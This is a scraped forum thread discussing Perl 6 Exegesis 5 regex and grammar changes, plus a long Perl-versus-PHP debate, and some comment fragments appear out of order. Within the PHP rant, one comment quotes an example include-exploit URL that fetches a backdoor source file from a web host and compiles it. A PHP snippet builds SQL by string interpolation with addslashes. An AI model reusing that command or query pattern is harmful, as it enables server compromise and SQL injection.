Damian Conway Publishes Exegesis 5
prostoalex writes "Come gather round Mongers, whatever you code,
And admit that your forehead's about to explode,
'Cos Perl patterns induce complete brain overload,
If there's source code you should be maintainin',
Then you better start learnin' Perl 6 patterns soon, For the regexes, they are a-changin'. This remix of Bob Dylan serves as an epigraph to Exegesis 5."
-Don
Take a look and feel free: http://www.PieMenu.com
I was excited for Perl 6 when it was first starting out, then I reading about all the stuff that is going to change, and got worried. Now, after reading this, I've come to the conclusions that I am sticking with Perl 5, as for my Web stuff, I'm finally taking theplunge and learning PHP. Perl 6 is starting to become a completely different language, all y stuff works now, and I don't feel like porting.
Objects in the blog are closer then they ap
You'll still be able to use Perl5 regexes by indicating a special flag to the regex engine. So you don't have completely jump right in from the start. But from reading Apocalypse 5, Perl6 regexes look to be much much cooler. So you'll probably want to learn them anyway.
--
Promoting critical thinking since 1994.
Bob Dylan rolling in his grave knocked over my drink!
Oh, wait, he's not dead yet.
Carry on . . .
----------
I am an expert in electricity. My father held the chair of applied electricity at the state prision.
I know guys who can regex in their sleep, and they've been using mostly compatible syntax for YEARS! This new stuff looks completely different, and if perl isn't going to be backwards compatible, i forsee a huge backlash, or a AnotherGNUPerl fork or something. (AGP is taken... doh)
it's important to allow people to use existing skillsets while expanding into the new syntax.
Ah slashdot, the only place on earth where regexes are "cool" and a bad Weird Al-like parody of a Bob Dylan song is a "remix".
sig:
See the "..for smart people" banners Wired runs here? Look elsewhere guys.
CPAN is a powerful resource. If all those modules get left behind, I fear we may end up with a more eloquent language in Perl 6 but with substantially less usability.
Damian was illustrating advanced concepts in this article. Things are not going to get more complicated if you are a mid level perl programmer and never cared about zero-width positive look-behind assertions. Other good news is that perl6 is not expected to be production ready for at least 4 years; you have plenty of time to become a perl wizard.
couldn't they have been gentler? However, if it lets me handle HTML easily, without having to learn all kinds of packages that do lots of things I don't need, then I'm all for it. John Roth Watch that speed limit sign on the learning curve!
- Why is Perl changing so much?!
- But what about my programs? Why break them?!
- Why would you want to break compatibility with other regular expression engines?
Some of this will be good for everyone. Some of it some of you won't like, but a lot of it you will. Give Perl 6 a chance, and don't react as if we've shot your pet.Because it needs to. Perl is the legacy of something like 15 years of development and evolution. It started as a simple text processing system, and is now used in every field of endevor where computers are used. There are some old things that needed to go, some new things that were needed and generally a need to re-examine the way "stuff" was done.
Perl 6 is two things (at least): a parser for Perl 6 and a back-end virtual machine, much like Java or C#. One of the design criteria for the release of Perl 6 is a Perl 5 compatible parser front-end that outputs Perl 6 virtual machine bytecode. This means that your Perl 5 programs will run with no modification in a Perl 6 environment (or at most a path change to the interpreter, that much is still under some debate).
Remember that Perl has been leading the pack in terms of regular expression handling for a long time. Now Perl is moving beyond regular expressions to grammar specification. This is a good thing, as long as the benefits of regular expressions are preserved.
-- Sorry, I can't think of anything funny to say here.
I only had time to skim the article, and anyway it would take anyone a while to absorb all that code. Here's the short summary:
Regex's in Perl have accumulated too much cruft to be called regular expressions anymore. So now they're full grammers.
That's right. Now you can pattern match with a very readable grammer syntax that is easily decorated with Perl code to do parsing. YACC for Perl. You can find packages for this on CPAN, but this is integrated with the language.
No whining about the bad old days of Perl regex syntax for me... now I'm actually excited by the prospect of needing to buy a new llama book.
Most of the Perl 6 changes seem to be for the better, but two in particular particularly gall me: changing arrow to dot, and changing ARGV to ARGS.
The rationale for losing arrow was that it made more operators available, and that it was more familiar to users of other OO languages. I suppose it's also easier to type; not only one less character, but no shift key. But it seemed like a change just to force old programs to be rewritten.
And ARGV? Simply because it was supposed to be old fashioned, unfamiliar, not obvious. BAH. Change for no reason other than to commit breakage and force a rewrite.
I will probably switch as time goes by, but to Ruby rather than Perl 6. If I'm going to have to touch every file, I may as well do it the right way.
Infuriate left and right
People--especially FUDchunkers--are missing the most important points:
.NET it would seem).
Almost all of the most useful Perl5 code of today will be runnable by Perl6 tomorrow: the compiler will fall back to perl5 and the VM is language neutral (even moreso that
In addition to running most perl5 modules as-is, Perl6 matching rules will have a perl5 backwards compatability mode built in so you can continue using the Perl5 regular expressions you know and love from Perl, Java, and everywhere else that's adopted them as needed in Perl6 code.
Yes, Perl6 is a rewrite and introduces a lot of deep CS concepts and ew syntax, but some care is being taken to assure that most Perl5 code will be runnable as is, while people learn about the power of some of the advanced tools Perl6 will provide.
Please Don't Panic (or incite others to): the apocolypses and exegises are technical documents, they are not meant to be smooth, easy reading or to reassure today's perlers that their hard won skills will be useful. They're meant to describe what's new and different and usually why. Don't be scared by the new and different, just as with existing Perl, you should be able to adopt the powerful new concepts and syntax as you need to without having to swallow it whole or unlearn everything you already know.
Perl6 will be stunningly more powerful, expressive, and provide (optionally) the safety features required for average coders to implement large systems while letting experts use extremely powerful tools like closures, continuations, intricate pattern matching that have mostly been accessible in academic languages to this point. And it will still allow convenient scripts to be generated if that's what you need to do.
Remember folks, other languages can make shitty code smell nice, but it's still shitty code and you wouldn't want to eat^Wmaintain it.
- Barrie
Someone asked this very question at Damien's Pel 6 talk YAPC. According to Damien the "use CGI" (or whichever package) construct will tell the Perl 6 interpreter that the package being "use"'d is Perl 5 code. So the CPAN modules will still work.
Hopelessly pedantic since 1963.
Because star can mean 0 to infinity. You are confusing "*" with "+". Plus would have meant 1 to infinity.
@matches = $str =~ m:any/ah*/; # returns "ahhh", "ahh", "ah", "a"
@matches = $str =~ m:any/ah+/; # returns "ahhh", "ahh", "ah"
I first used perl back in version 3, something like 12 years ago. I first really learned perl, v4, about 9 years ago. It did everything I ever needed.
Then, perl 5 came out. I didn't bother "learning" it -- that is, I've been using it, and when I really need to, I've used some perl 5 features, but I've learned them as I go (by example), and I know I'm not really using the full capabilites. (plus, though I know what I'm doing, I don't always know what to call what I'm doing -- I got stumped the other day when someone asked me how to do pointers in perl. I drew a blank, not making the connection to all the weird hash magic I'd been doing lately. But I digress.)
Anyway, the bottom line of this is: Perl 5 looked interesting, but like more of the same, and wasn't really compelling for me to buckle down and learn all the new features. Perl 6, on the other hand, scares me. In a good way.
Here's a page-by-page description of how I read the article:
- Page 1: Hm. Looks like they're describing a grammar with regex. Cool.
- Page 2: I can intuitively match against a set of strings! Wild. These strings can be expressions themselves? Even better!
- Page 3: It's a grammar. A full, honkin, real, honest-to-goodness grammar. That I can match against. Are those angels I hear singing?
- Page 4: <head explodes>
- Page 5: <drools>
Seriously, though, I was concerned at first that I'd have to learn something new, crazy, and difficult (given how screwed-up much of perl 5 has seemed, at times). I'm impressed. I'm very impressed. Yes, I have to learn somthing new and crazy, but it's not at all difficult. In fact, I think I've already learned it.The power that this new system holds, and, more importantly, the simplicity of it all, is amazing.
So, unlike some other posters, I can't wait for Perl 6. When does this come out, again? And, more importantly, when can I buy the new book?
(also, was I the only one who expected, after the demonstration of matching method invocations, to be told that the entire source code for perl6 was just one giant RegEx/Grammar?)
Gotta love the sense of humour. After describing one, two, and three colon rules (read the article, page three), they get to the potential fourth...
Basically the new rule (not 'regex') syntax seems to be bent on destroying Perl's "Line noise with a purpose" reputation..."The best argument against democracy is a five minute chat with the average voter."
--Winston Churchill
From the exegesis:
The first thing to note is that, like a Perl 5 qr, a Perl 6 rx can take (almost) any delimiters we choose. The $hunk pattern uses {...}, but we could have used:
rx/pattern/ # Standard
rx[pattern] # Alternative bracket-delimiter style
rx<pattern> # Alternative bracket-delimiter style
rxforme # Délimiteurs très chic
rx>pattern< # Inverted bracketing is allowed too (!)
rxMuster # Begrenzungen im korrekten Auftrag
rx!pattern! # Excited
rx=pattern= # Unusual
rx?pattern? # No special meaning in Perl 6
rx#pattern# # Careful with these: they disable internal comments
Are these allowed for the sole purpose of creating new T-Shirt patterns?
Note: this is probably going to be horrendously biased because 99% of the PHP stuff I do is maintaining and customizing a vBulletin. For those who have ever dealt with this piece of crapware I'll say nothing more. Suffice it to say that if you run diff on, say, newthread.php and newreply.php the output is disturbingly short.
t _path=http://my.webserver.com/&phpEx=txt&cmd=lynx+ -source+http://my.webserver.com/1337-backdoor.c+|+ gcc+-o+/tmp/1337-backdoor or something like that then it's quite clear that things are getting absolutely fucking ridiculous. In fact the PHP team have realized this and forced you to use $HTTP_POST_VARS or whatever other four-mile-long identifier to get at your vars (oh, sorry it's $_POST now) ... well, at least if php.ini says so. Which you can't count on anyway so I always write a little routine to bomb out the global namespace (except for the superglobals) at the start of each of my scripts. Stupid and unnecessary.
... need I go on?
Look, I'm sorry but exactly what was supposed to be great about PHP? the fact that you can easily embed it in HTML code, that it integrates cleanly with MySQL and that you can pass args to it easily. Let us demolish each of these in sequence
* HTML embedding - Ever heard of MVC? I'm sorry, but if you compare something like this:
<ul>
<?php foreach ($users as $user) { ?>
<li><a href="user.php?userid=<?php echo $user->userid ?>"><?php echo $user->username ?></a></li>
<?php } ?>
</ul>
and, say, the equiv in Template Toolkit:
<ul>
[% FOREACH user = users %]
<li><a href="user.pl?userid=[% user.userid %]">[% user.username %]</li>
[% END %]
</ul>
now you tell me which looks neater? HTML-like templating syntax just looks dire because it all falls apart when you have to include stuff inside attributes. Not only is it ugly but it's unmaintainable. Want to skin your site in PHP? forget it. Want to skin it in perl/TT/CPAN templating engine of your choice? no problem, just supply a different base path to your template engine of choice. Of course most PHP coders have realized this so they've created their own templating engine, or use something like Smarty and just wrap everything in one great big PHP tag. Which quite frankly just defeats the entire point.
* Argument passing - this is hellish. Anything that comes in in a query string, cookie or post variable immediately enters your global namespace, where your often CRITICAL state variables are - hope you initialized them! I can't tell you how many times I got exploited by some stupid XSS exploit or the totally useless ability of include() to pull stuff in over HTTP. It's bad enough when a script kiddie just needs a unix system and the ability to use a compiler to root a machine but when 'h4xx0ring' can be done just by typing http://phpbb.mysite.com/includes/db.php?phpbb_roo
* MySQL integration - eh?! I'm sorry but I HATE the PHP MySQL API. The error handling is a joke so most people write their own wrappers around MySQL to catch errors and deal with them (that or it's back to checking the return value of every little thing. Thanks but if I wanted to do that I'd program in C). That and don't get me started on slashing. php.ini is set up so that your incoming variables may or may not get slashed. Again, you can't influence this or count on it if you've got shared hosting of some sort so either you've got to manually strip all the slashes out again or put them in - in which case you either have to deslashify something if you're using it internally or slashify it when passing it to mysql_query() to make sure someone doesnt take a great big shit all over your SQL. And that's if you're using MySQL. If you're using Postgres, there's a different API, and if you're using Oracle then there's a third. The fact that there's TWO different database abstraction systems built into the core of PHP (DBx and ODBC) and then some in PEAR shows that something is really horribly wrong.
Now compare to Perl DBI or Java JDBC or anything else which actually has a sane DB access API.
eval {
my $sth = $dbh->prepare('SELECT userid FROM user WHERE username = ?');
$sth->execute($username);
my $userid = $sth->fetchrow_array;
} if ($@) { confess "SQL Error: $@"; }
which in PHP looks like
if (!get_magic_quotes_gpc()) {
$username = addslashes($username)
}
$q = mysql_query("SELECT userid FROM user WHERE username = '$username'")
or die("Query failed: " . mysql_error());
if ($r = mysql_fetch_row($q)) {
$userid = $r[0];
}
I know which one I prefer. That and let's not forget the fact that every time you access a page, that page is parsed, its dependencies are parsed, initialization is performed, and then it handles your request. Also the standard library that comes with it is cack - everything is in the global namespace, there's no object orientation at all, parts of it look like the C standard library's been retrofitted into it because the designers were too damn lazy, it's inconsistent, there's several conflicting ways of doing everything and it's so badly designed that you're usually working AGAINST it than with it. (want to slurp a file? well you can use the file() command to make an array of lines, which you can join together again, or you can use readfile() which sends a file directly to the client, however you can get round that by using output buffering to capture it. Or you can use fopen() and the related commands to open the file, find its size, read it into a scalar then close it again. Aargh!)
Now, look, I must admit Perl isn't great either. mod_perl is fast as lightning but it's got a ton of idiosyncracies of its own (mainly in the way of including things, eg include paths, namespaces, etc) and a lot of weird side-effects that are far from obvious and get in the way most of the time. I've written my own mini-wrapper around it that irons most of it out but it's still quite a pain.
As for PHP though, it does have its place, but remember what PHP stands for - PHP Hypertext PREPROCESSOR (I think). As SSI on steroids with some ability to interface with MySQL, it's a great system. But writing things like messageboards or shopping carts or portals in PHP is sheer lunacy. I've managed a PhpBB and a vBulletin as well as writing a mini news system that integrates with vB so maybe my experience isn't that great and someone ought to hit me with a clue-by-four. But if you can, please do because from what I've seen I find it very hard to like this language.
Because I can't pronounce Exegesis. I can pronounce Perl.
You are upset that Perl 6 is changing significantly enough that you feel it could be classified as a different language. And you don't want to learn a new language so to solve your dilemma you are going to learn a different language? :)
but without the S
-c
I have discovered a truly remarkable proof which this margin is too small to contain.
Things are being taken in order. Each Apocalypse corresponds to a chapter in Programming Perl 3e. We'll get to objects, never fear. They're just not next.
I fail to see why people feel that Perl and Ruby need to compete. Both can happily live side by side, and are not difficult to learn(at least the basics).
Learn both. They both have good points, and bad. I'd love an easier OO model in Perl5, but I'd also like more control over scoping in Ruby. The Ruby and Perl development communities are both listening to each other, from what I've seen, and drawing on their shared and unique experiences to further both languages. Why shouldn't the users of these languages do the same?
RE: * HTML embedding
You can also do this:
<? foreach ($users as $user)
{
include "templates/user/usertemplate.php";
}
?>
Then usertemplate.php contains
<li><a href="user.php?userid=<?= $user->userid ?>"><?= $user->username ?></a>
or
<? echo "<li><a href="user.php?userid= $user->userid">$user->username</a>" ; ?>
The trick is if you tuck most (or all) of your html in the templates directory then you can have skinning. Just make multiple templates directories and keep track of which one you're pulling the content from. This forces you to split your html from your objects, and as a bonus you get more code reuse. Your object's html templates are neatly tucked away in their own directories.
RE: * Argument passing
Turn off register_globals and use $_REQUEST and the other superglobals to do what you need. Never trust user input, yadda yadda. This has been a weakness in the past, but now it's a bit harder to get burned. I shot myself in the foot a couple times and had to learn how to deal with this stuff. PHP is a newbie friendly language, but secure PHP takes some experience to get right.
RE: * MySQL integration
Agreed. About this time last year I finally rolled my own DB wrapper that does what I need. My gripe with most abstraction layers is that they may claim to be DB independant, but cater to the lowest common denominator: mysql. Sorry, but if I'm using a "real" database I'm going to break out the stored procedures, transactions and more. If I get to use stored procedures, then my overall approach is going to change enough to break the abstraction layer. Things may have improved, but the last time I looked at it I went with the db specific funtions. I'd like to see some improvement here.
More notes:
As far as the 'parse, parse, reparse and initialize' cycle, you can alleviate some of that with caching. I've rolled functions to do this by output buffering entire pages (or significant includes), placing them on disk or in the database and serving those to the users. It depends on how often you update your site, but for fairly static pages it works OK. You can also break out the Zend cache or other products if you want to 'do it right'.
I don't see a problem with three different ways to open a file. Each one has a use and a historical reason for existing. Each one also gets the job done for the general case. Yes the namespace is a bit cluttered but the docs are very good. It seems like a design goal for PHP has been to wrap every useful library they can. This brings in a bunch of the C style file operations. Then you get the design goal to make tools to build webpages. That gives you output buffering tricks and so on. Learning to deal with this is all a part of PHP.
Just because PHP makes it easy for a 'non-programmer' to submit a form to a database it doesn't mean that it is an easy language to use for large projects. Maintaining bad PHP is hell and refactoring can be problematic. However, I do think PHP is appropriate for portals, message boards, and online catalogs. You just need to take the right approach: Object orientation (or good procedural libraries), templates, php.ini tweaking, coding standards and so on. It's not the easiest language to scale up, but it can be done. The problem is that it is such an easy language to do litle things in, they screw up when they do big things with it. Just like Perl.
was I the only one who expected, after the demonstration of matching method invocations, to be told that the entire source code for perl6 was just one giant RegEx/Grammar?
/^<$code <perlgrammar>>$/ {
/usr/bin/perl in a nutshell.
That's correct, and has been Larry's plan since the beginning. The Perl6 eval will be a rule like so:
if
Parrot.execute $code.bytecode;
}
Add command-line handling and that's your
Replying to the question just once:
"What more control could you want over scoping in Ruby?"
Oh, Ruby's good at this. But going back to Perl the last several months for reasons including Parrot, I've come to appreciate "my". Wile I generally like how Ruby handles scoping, every once in a while there's a problem where I think "everything else makes Ruby a good fit to this, but there's a really nifty Perl trick with my that I could apply here."
But because they're sooooo smart, they write things like this:
In other words, a raw variable in a Perl 6 pattern is matched as if it was a Perl 5 regex in which the interpolation had been quotemeta'd and then placed in a pair of non-capturing parentheses.
OK. OOOOK. I'm really looking forward to Perl 6 For Dummies. Now pardon me while I go back to reading something easy, like differential geometry.
But seriously, what really excites me about Perl 6 is Parrot. It's going to be just ultra-cool to be able to link to Python and Ruby (and C) with no fuss and no muss. To me, the rest is just syntactic sugar.
Find free books.